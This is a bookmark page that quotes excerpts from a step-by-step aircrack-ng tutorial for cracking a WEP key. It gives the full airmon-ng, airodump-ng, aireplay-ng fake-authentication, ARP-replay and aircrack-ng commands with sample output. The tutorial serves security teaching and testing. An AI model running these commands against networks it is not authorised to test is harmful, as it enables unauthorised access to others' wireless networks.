This link has been bookmarked by 109 people . It was first bookmarked on 21 Mar 2008, by someone privately.
-
29 Nov 14
-
replay an ARP packet to generate new unique IVs.
-
explain the reason and background of each step.
-
drivers patched for injection
-
physically close enough to send and receive access point packets.
-
have to be physically close enough for your transmitted packets to reach and be received by the AP
-
change “ath0” to the interface name which is specific to your wireless card
-
MAC address of PC running aircrack-ng suite
-
MAC address of access point
-
Wireless network name
-
Access point channel:
-
Wireless interface
-
gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly.
-
injection to speed up the process.
-
capture a large number of IVs in a short period of time.
-
access point (AP) resend selected packets over and over very rapidly.
-
mode whereby your card can listen to every packet in the air.
-
put your card into what is called monitor mode
-
airmon-ng stop ath0
-
start the wireless card on channel 9
-
must have your wireless card locked to the AP channel
-
madwifi-ng drivers
-
“ath0” is reported above as being put into monitor mode
-
Access Point: 00:0F:B5:88:AC:82
-
Mode:Monitor
-
ath0 is in monitor mod
-
channel 9
-
MAC address of your wireless card
-
only the madwifi-ng drivers show the MAC address of your wireless card
-
injection test
-
wireless network name
-
access point MAC address
-
wireless interface name
-
-
09 Nov 14
-
17 Aug 14
-
19 Oct 13
-
This tutorial walks you though a very simple case to crack a WEP key
-
change the values in the examples below to the specific network
-
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs)
-
- Start the wireless interface in monitor mode on the specific AP channel
- Test the injection capability of the wireless device to the AP
- Use aireplay-ng to do a fake authentication with the access point
- Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs
- Start aireplay-ng in ARP request replay mode to inject packets
- Run aircrack-ng to crack key using the IVs collected
Here are the basic steps we will be going through:
-
Step 1 - Start the wireless interface in monitor mode on AP channel
-
The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air.
-
airmon-ng start wifi0
-
Step 2 - Test Wireless Device Packet Injection
-
The purpose of this step ensures that your card is within distance of your AP and can inject packets to it.
-
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
-
- -9 means injection test
- -e teddy is the wireless network name
- -a 00:14:6C:7E:40:80 is the access point MAC address
- ath0 is the wireless interface name
-
Step 3 - Start airodump-ng to capture the IVs
-
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
-
- -c 9 is the channel for the wireless network
- -
-bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic. - -w capture is file name prefix for the file which will contain the IVs.
- ath0 is the interface name.
-
Step 4 - Use aireplay-ng to do a fake authentication with the access point
-
In order for an access point to accept a packet, the source MAC address must already be associated.
-
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
-
- -1 means fake authentication
- 0 reassociation timing in seconds
- -e teddy is the wireless network name
- -a 00:14:6C:7E:40:80 is the access point MAC address
- -h 00:0F:B5:88:AC:82 is our card MAC address
- ath0 is the wireless interface name
-
Step 5 - Start aireplay-ng in ARP request replay mode
-
The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network
-
we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.
-
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
-
Step 6 - Run aircrack-ng to obtain the WEP key
-
The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
-
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
-
- -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
- output*.cap selects all files starting with “output” and ending in ”.cap”.
-
To also use the FMS/Korek method, start another console session and enter:
-
aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap
-
- -K invokes the FMS/Korek method
- -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
- output*.cap selects all files starting with “output” and ending in ”.cap”
-
You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key
-
-
12 May 13
-
13 Feb 13
fernandosure"hat in this case it took far less then the estimated 250,000 IVs to crack the key. (Fo"
-
30 Nov 11
-
27 Sep 11
-
29 Jul 11
-
It assumes you have a working wireless card with drivers already patched for injection.
-
aireplay-ng replay an ARP packet to generate new unique IVs.
-
aircrack-ng uses the new unique IVs to crack the WEP key
-
-
06 May 11
-
21 Dec 10
-
14 Nov 10
-
- -9 means injection test
- -e teddy is the wireless network name
- -a 00:14:6C:7E:40:80 is the access point MAC address
- ath0 is the wireless interface name
Test Wireless Device Packet Injection
The purpose of this step ensures that your card is within distance of your AP and can inject packets to it.
Enter:
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
Where:
The system should respond with:
09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy' 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
-
-
13 Sep 10
-
26 Aug 10
-
05 Aug 10
-
10 Jul 10
-
09 Jul 10
-
25 May 10
-
22 Dec 09
-
17 Nov 09
-
07 Nov 09
-
26 Jul 09
-
16 Mar 09
-
The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.
-
-
13 Jan 09
-
13 Dec 08
pootzko ~d(O_o)b~How to easily crack WEP with Aircrack-ng
-
24 Nov 08
-
10 Nov 08
-
08 Nov 08
-
27 Sep 08
-
08 Jul 08
-
04 May 08
-
27 Feb 08
-
22 Feb 08
-
25 Jan 08
-
29 Dec 07
-
13 Dec 07
-
04 Nov 07
-
24 Oct 07
-
19 Oct 07
-
01 Oct 07
-
05 Jun 07
-
28 May 07
-
13 May 07
-
26 Apr 07
-
17 Apr 07
-
13 Apr 07
-
09 Apr 07
-
08 Apr 07
-
06 Apr 07
-
05 Apr 07
-
04 Apr 07
Would you like to comment?
Join Diigo for a free account, or sign in if you are already a member.